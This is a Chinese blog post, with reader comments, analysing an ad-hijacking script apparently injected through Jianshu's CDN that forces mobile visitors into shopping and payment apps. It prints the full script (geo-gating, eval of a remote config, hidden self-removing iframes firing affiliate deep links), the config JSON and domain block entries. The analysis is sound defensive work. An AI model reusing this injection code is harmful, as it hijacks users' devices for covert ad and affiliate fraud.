每次手机上搜资料时,只要进入了简书,那么必定会跳转到各种app(淘宝、京东、天猫、京东金融等等),很烦的啊。
2020-02-02 更新:
在csdn、豆瓣上也发现这个问题。
我还以为是我本地宽带或者dns劫持,但是我本地dns用的是114和119,很少出现这种问题,而且简书也是https,浏览器也是绿标,
所以就usb chrome 远程调试看了下,不看不知道,居然会唤醒这么多app和跳转网页。

临时解决方案
屏蔽 ad.lflucky.com 这个域名(建议屏蔽这个域名下的所有二级域名),改 hosts 也行(注意 hosts 文件不支持通配符,只能逐条屏蔽具体的主机名)。
方法一: 手机端使用 火狐浏览器,安装 AdGuard 广告过滤插件,屏蔽 ad.lflucky.com
方法二:有位读者推荐的软件也很不错,AdGuard Home,安装在软路由中使用~
2020-03-09:
广告代码改为https://jian.t58b.com/js/jan/jian.js
所以,继续屏蔽 jian.t58b.com。
最后想了下,既然是cdn劫持,那么我把cdn域名一刀切怎么样,别说,效果还蛮不错的,界面干净了。
屏蔽整个cdn下的js,不过这样带来的后果是文章不能动态加载出来,只适合偶尔使用简书。
cdn2.jianshu.io/*.js
手机端用yandex浏览器,装广告屏蔽插件,屏蔽 ad.lflucky.com 这个域名(建议屏蔽这个域名下的所有二级域名),我个人装的是广告终结者,本来想装uBlock的,懒得折腾就没装。
或者路由器ad插件屏蔽这个域名。
添加屏蔽域名后完美,终于不再跳转。
分析
因为我的前端是废的,所以也只能进行简单点的分析,大佬们看看就好了。
简单分析了一下跳转js,点击 VM2486:1 进入到js,格式化后的代码如下
(function() {
/**
 * Issues an asynchronous GET for `a` and passes the evaluated response to `b`.
 *
 * Only a completed request (readyState 4) with HTTP status 200 reaches the
 * callback; every other outcome is ignored without any error handling.
 *
 * @param {string} a - URL to request (the only call in this script passes a relative path).
 * @param {Function} [b] - Callback receiving the evaluated response; skipped when falsy.
 */
function getJson(a, b) {
var c = new XMLHttpRequest();
c.open("get", a);
c.send(null);
c.onreadystatechange = function() {
if (c.readyState == 4 && c.status == 200) {
// NOTE(review): the body is run through eval() rather than JSON.parse(), so
// whoever controls the response can execute arbitrary script in this
// document, not merely supply data.
b && b(eval("(" + c.responseText + ")"))
}
}
}
/**
 * Holds the remotely supplied configuration that drives the app deep-link launches.
 *
 * @param {Object} a - Evaluated configuration object; `productJson` and
 *   `avokeTime` are the only fields read here.
 */
function ProductLink(a) {
// Link definitions: `mainProduct` and `secondaryProduct` are read by the prototype methods.
this.product = a.productJson;
// Region names that init() compares against returnCitySN["cname"]; a match
// makes the script do nothing for that visitor.
this.disabledArea = ["UNITED STATES", "JAPAN", "SINGAPORE", "CANADA", "香港", "北京", "上海"];
// Interval in seconds between secondary launches (multiplied by 1000 in showSecondaryProduct).
this.avokeTime = a.avokeTime
}
/**
 * Entry point: decides whether this visitor gets the deep-link launches.
 *
 * Nothing happens when navigator.platform contains "Win" or "Mac", so the
 * behaviour is not observable from a desktop browser on those platforms.
 * Otherwise the region lookup is started and, unless the reported region
 * matches an entry in `disabledArea`, addElement() is called.
 */
ProductLink.prototype.init = function() {
var b = this;
// Empty "then" branch: Windows and Mac platforms are skipped entirely.
if (window.navigator.platform.indexOf("Win") > -1 || window.navigator.platform.indexOf("Mac") > -1) {} else {
this.isDisabled(function() {
// `a` means "allowed to proceed"; it only becomes false on a region match.
var a = true;
try {
for (var i = 0; i < b.disabledArea.length; i++) {
// returnCitySN is a global not defined in this script; presumably it is set
// by the geo-lookup script that isDisabled() loads (verify against that response).
if (returnCitySN["cname"].indexOf(b.disabledArea[i]) > -1) {
a = false;
break
}
}
// Any exception (for example returnCitySN being undefined after the lookup
// timed out) is swallowed and `a` stays true, so the launches still run.
} catch(e) {}
if (!a) {
return
}
b.addElement()
})
}
};
/**
 * Loads the third-party geo-lookup script and then invokes `a` exactly once.
 *
 * Despite its name this method makes no decision itself: it only injects a
 * <script> element pointing at the lookup URL and calls `a` when the script
 * has loaded or after 4000 ms, whichever comes first.
 *
 * @param {Function} [a] - Continuation to run after the lookup attempt; skipped when falsy.
 */
ProductLink.prototype.isDisabled = function(a) {
var b = document.createElement("script");
// `c` records whether the continuation has already run.
var c = false;
document.body.appendChild(b);
b.src = "https://pv.sohu.com/cityjson";
b.onload = function() {
if (!c) {
c = true;
a && a()
}
};
// Fallback: continue after 4 seconds even if the lookup script never loads.
setTimeout(function() {
if (!c) {
c = true;
a && a()
}
},
4000)
};
/**
 * Schedules the launches: 2000 ms after being called it triggers the main
 * product once and starts the timed sequence of secondary products.
 */
ProductLink.prototype.addElement = function() {
var a = this;
setTimeout(function() {
a.showMainProject();
a.showSecondaryProduct()
},
2000)
};
/**
 * Launches one link of the main product by handing its `appLink` list and
 * `cancelTime` to showAllKind().
 */
ProductLink.prototype.showMainProject = function() {
this.showAllKind(this.product.mainProduct.appLink, this.product.mainProduct.cancelTime)
};
/**
 * Works through the secondary products in random order, one per interval.
 *
 * Every `avokeTime` seconds a random remaining entry is passed to
 * showAllKind() and removed from the working copy; the timer is cleared once
 * no entries are left.
 */
ProductLink.prototype.showSecondaryProduct = function() {
var b = this;
// concat() with no arguments makes a shallow copy, so the configured array is not modified.
var c = this.product.secondaryProduct.concat();
// `d` tracks how many entries of the copy are still unused.
var d = c.length;
var e = null;
e = setInterval(function() {
if (d <= 0) {
clearInterval(e);
return
}
var a = Math.floor(Math.random() * d);
b.showAllKind(c[a].appLink, c[a].cancelTime);
c.splice(a, 1);
d--
},
b.avokeTime * 1000)
};
/**
 * Picks one usable link from a product's `appLink` list and opens it.
 *
 * Entries are tried in random order until one is opened: a "random" entry
 * uses its `link` field, a "date" entry uses the value stored under today's
 * "YYYY-MM-DD" key and is discarded when it has no such key.
 *
 * @param {Array<Object>} a - The product's `appLink` entries.
 * @param {number} b - Seconds after which newIframe() removes the frames again.
 */
ProductLink.prototype.showAllKind = function(a, b) {
// Shallow copy so that discarding entries leaves the configuration untouched.
var c = a.concat();
var d = c.length;
// `e` becomes true once a link has been opened, which ends the loop.
var e = false;
var f = this.getCurrentDate();
while (d > 0 && !e) {
var g = Math.floor(Math.random() * d);
if (c[g].type == "random") {
this.newIframe(c[g].link, b);
e = true
} else if (c[g].type == "date") {
if (c[g][f]) {
this.newIframe(c[g][f], b);
e = true
} else {
c.splice(g, 1);
d--
}
}
// NOTE(review): an entry with any other `type` is neither opened nor removed,
// so a list holding only such entries would keep this loop spinning.
}
};
/**
 * Returns the browser's local date as a zero-padded "YYYY-MM-DD" string, the
 * format used for the per-day keys of "date" link entries.
 *
 * @returns {string} Today's local date.
 */
ProductLink.prototype.getCurrentDate = function() {
var a = new Date(),
Y = a.getFullYear() + "-",
M = (a.getMonth() + 1 < 10 ? "0" + (a.getMonth() + 1) : a.getMonth() + 1) + "-",
D = a.getDate() < 10 ? "0" + a.getDate() : a.getDate();
return Y + M + D
};
/**
 * Opens link `b` in an invisible iframe and removes the frame again later.
 *
 * A second invisible iframe loads "./counturl.html" with the link URL-encoded
 * in its query string (presumably a hit counter; its content is not part of
 * this listing). Both frames are appended to document.body and removed after
 * `c` seconds. For analysts: the visible trace is a pair of display:none
 * iframes that exist only for a few seconds.
 *
 * @param {string} b - Link to load in the hidden frame.
 * @param {number} c - Lifetime of both frames in seconds.
 */
ProductLink.prototype.newIframe = function(b, c) {
var d = document.createElement("iframe");
d.style.display = "none";
d.src = b;
document.body.appendChild(d);
var e = document.createElement("iframe");
e.style.display = "none";
// Relative URL: it resolves against the document this script runs in.
e.src = "./counturl.html?url=" + encodeURIComponent(b);
document.body.appendChild(e);
// The immediately-invoked wrapper binds the two frame elements for the removal callback.
setTimeout((function(m, a) {
return function() {
document.body.removeChild(m);
document.body.removeChild(a)
}
})(d, e), c * 1000)
};
// Bootstrap: fetch the link configuration from a path relative to the hosting
// document and start the logic with whatever that response evaluates to.
// Because the configuration is fetched on every load, the set of launched
// links can change server-side without this script changing.
getJson("./json/product.json",
function(a) {
new ProductLink(a).init()
})
})();
嗯,上面有个getJson方法,搜索了下加载记录发现域名是:
https://ad.lflucky.com/janes/json/product.json(对应ip为:59.110.185.253)
阿里云的机器,很不错,考虑到各种不同的宽带用户,给予最佳的劫持体验。
Json内容如下(时间 2019-08-31 15:52 ):
{
"productJson": {
"mainProduct": {
"appName": "tb",
"appLink": [
{
"type": "random",
"link": "tbopen://m.taobao.com/tbopen/index.html?source=auto&action=ali.open.nav&module=h5&bootImage=0&spm=2014.ugdhh.4076930961.10016-1208-32768&bc_fl_src=growth_dhh_4076930961_10016-1208-32768&materialid=10016&h5Url=https://h5.m.taobao.com/bcec/dahanghai-jump.html?spm=2014.ugdhh.4076930961.10016-1208-32768&bc_fl_src=growth_dhh_4076930961_10016-1208-32768"
}
],
"cancelTime": 5
},
"secondaryProduct": [
{
"appName": "uc",
"appLink": [
{
"type": "date",
"2019-08-30": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=17707084109410804287&type=multiple&from=6001",
"2019-08-31": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
"2019-09-01": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
"2019-09-02": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
"2019-09-03": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=5414198177651951323&type=multiple&from=6001",
"2019-09-04": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=5414198177651951323&type=multiple&from=6001",
"2019-09-05": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=1692900910150652661&type=multiple&from=6001",
"2019-09-06": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=1692900910150652661&type=multiple&from=6001"
}
],
"cancelTime": 5
},
{
"appName": "sjbd",
"appLink": [
{
"type": "random",
"link": "baiduboxapp://v1/easybrowse/open?url=https://dwz.cn/1VJnrokX?u=68a5251f61c446dd&needlog=1&logargs={"source":"1023217w","from":"openbox","page":"other","type":"","value":"url","channel":""}"
}
],
"cancelTime": 5
},
{
"appName": "yk",
"appLink": [
{
"type": "random",
"link": "youku://weex?source=00002184&url=https://t.youku.com/yep/page/m/sanfang1903_wmdt?wh_weex=true&isNeedBaseImage=1&refer=sanfang1903_operation.qrwang_00002184_000000_2qiMB3_19053000&refer=sanfang1903_operation.qrwang_00002184_000000_2qiMB3_19053000"
}
],
"cancelTime": 5
},
{
"appName": "wph",
"appLink": [
{
"type": "random",
"link": "vipshop://goHome?tra_from=tra:C01V4m1bc22uzug2::mig_code::ac010m4olsydie4ern10dr6k8vkne6bd"
}
],
"cancelTime": 5
},
{
"appName": "jdjr",
"appLink": [
{
"type": "random",
"link": "jdmobile://share?jumpType=8&jumpUrl=https://u.jd.com/Yxw5iX?channellv=hqtf1&channel=default&sourceUrl=1108*gt001"
}
],
"cancelTime": 5
},
{
"appName": "pdd",
"appLink": [
{
"type": "random",
"link": "pinduoduo://com.xunmeng.pinduoduo/duo_coupon_landing.html?goods_id=2338511&pid=8827514_107105089&cpsSign=CC_190820_8827514_107105089_49f497cee8712faf331724b17240bda9&duoduo_type=2"
}
],
"cancelTime": 5
},
{
"appName": "zfb",
"appLink": [
{
"type": "random",
"link": "alipays://platformapi/startapp?appClearTop=false&appId=20000067&startMultApp=YES&url=https://render.alipay.com/p/f/fd-jr8wq5v4/pages/inside/index.html?pid=2088231933430185&partnerid=fl01&__webview_options__=pd%3DNO%26ttb%3Dauto&enableWK=YES"
}
],
"cancelTime": 5
},
{
"appName": "jd",
"appLink": [
{
"type": "random",
"link": "openapp.jdmobile://virtual?params={\"category\":\"jump\",\"sourceType\":\"sourceType_test\",\"des\":\"m\",\"url\":\"https://u.jd.com/dRrNLl\",\"unionSource\":\"Awake\",\"channel\":\"cedad4c0ad02455c9a818f1b3d98da1a\",\"union_open\":\"union_cps\"}"
}
],
"cancelTime": 5
},
{
"appName": "jrtt",
"appLink": [
{
"type": "date",
"2019-08-30": "snssdk143://search?keyword=信息学奥赛取消+有学生集训数月&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-08-31": "snssdk143://search?keyword=在家乡一口气买十套房?柳岩回应&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-09-01": "snssdk143://search?keyword=国内首例克隆猫主人:花了25万&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-09-02": "snssdk143://search?keyword=迪士尼不接受调解+坚持翻包检查&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-09-03": "snssdk143://search?keyword=宠物医疗市场扩张+执业医师稀缺&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-09-04": "snssdk143://search?keyword=游客坐路中央拍照交警提醒&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-09-05": "snssdk143://search?keyword=天降垃圾砸车可起诉全楼&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-09-06": "snssdk143://search?keyword=健身房承诺开泳池未兑现被投诉&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26"
}
],
"cancelTime": 5
},
{
"appName": "douyin",
"appLink": [
{
"type": "date",
"2019-08-30": "snssdk1128://detail?id=6727796549604150532&gd_label=click_schema_lx5",
"2019-08-31": "snssdk1128://detail?id=6727793959982157063&gd_label=click_schema_lx5",
"2019-09-01": "snssdk1128://detail?id=6728772476395949320&gd_label=click_schema_lx5",
"2019-09-02": "snssdk1128://detail?id=6728647813158145291&gd_label=click_schema_lx5",
"2019-09-03": "snssdk1128://detail?id=6729018672242871556&gd_label=click_schema_lx5",
"2019-09-04": "snssdk1128://detail?id=6729044398245498124&gd_label=click_schema_lx5",
"2019-09-05": "snssdk1128://detail?id=6728696625901980931&gd_label=click_schema_lx5"
}
],
"cancelTime": 5
}
]
},
"avokeTime": 2
}
在 productJson.secondaryProduct 看出,总共会跳转以下几个app
- UC
- sjbd(不知道是啥)
- yk(优酷)
- wph(不知道是啥)
- jdjr(京东金融)
- pdd(拼多多)
- zfb(支付宝)
- jd(京东)
- jrtt(不知道是啥)
- douyin(抖音)
可以看出来是真的恶心,最恶心的是跳转到这些页面
https://mip.yemnn.cn/llq_5/p7069z.html https://m.685862.vip/2019llq_5/p7069z.html?20190901001245&t=1786766884&f=1&i=1
导致不能后退、强制下载app,而且又得看历史记录才能到原来浏览的地方。这个部分没有重现出来,后面补上。


然后继续往上走,发现这个域名第一次出现的地方是
https://cdn2.jianshu.io/asimov/2.0a635c573bb72b959d07.js,简书的cdn
同时访问搜狐的接口进行ip地域解析,根据用户所在地区进行不同的广告或者跳转app。
剩下的不用分析也知道了,只有几种可能
- 简书 官方自己搞得跳转代码
- 简书用的cdn服务商进行的劫持
- 运营商结合cdn服务商一起劫持
此时我这里 cdn2.jianshu.io 解析的ip为:163.177.20.232
而在ipip和17ce发现,解析到这个ip的地区是广州联通、加上我的地区,会发生劫持。




Yandex浏览器添加ad插件进行屏蔽

跳转到页面,待复现分析......
更新
由于我开启了ipv6,默认解析dns变成了运营商的ipv6,导致返回的ip和公共dns不一样,运营商+cdn运营商劫持?
openwrt居然不能指定ipv6的dns,dhcp下发给客户端的v6 dns居然是运营商的
而电脑手机会按照v6的dns进行解析,不按照设置的v4 dns解析。

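根据ipip显示信息来看,是一家 天际友盟 广告联盟,而我好奇的是,这家公司是怎么拿到简书的ssl证书的?(补充:绿标只说明浏览器与对端节点之间的 TLS 连接和证书有效,并不保证该节点返回的 js 内容没有被改动;cdn 节点通常本身就部署了站点证书,所以脚本如果是在 cdn 或源站一侧被插入的,浏览器照样显示绿标。)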
手机浏览器还显示绿标

更新
在禁用ipv6后,我本地使用114和119解析还是被劫持的ip


手机端360极速浏览器可以设置禁止网页跳转APP
用360了,和裸奔没啥区别~
请问不让返回的代码是什么呀
sjbd=手机百度
我因为这个都不在手机点开简书;1,噗
wph=唯品会
jrtt=今日头条
make~
我也分析出来了 ad.lflucky.com 网址,除了简书 还有 豆瓣 ...都有劫持跳转app要慢慢分析了
csdn也是,貌似cdn投毒......
我用AdGuard Home放在路由器上,从此世界清净
我也试了一下,还是挺不错的~谢谢推荐 😀
手机知乎也是这样。
互联网毒瘤, 下个手机换苹果, 安卓没人权
这个没办法,国内环境不好,各种卖流量,其实用qq浏览器之类的也可以避免这种情况,但是用了国产浏览器后……你懂的……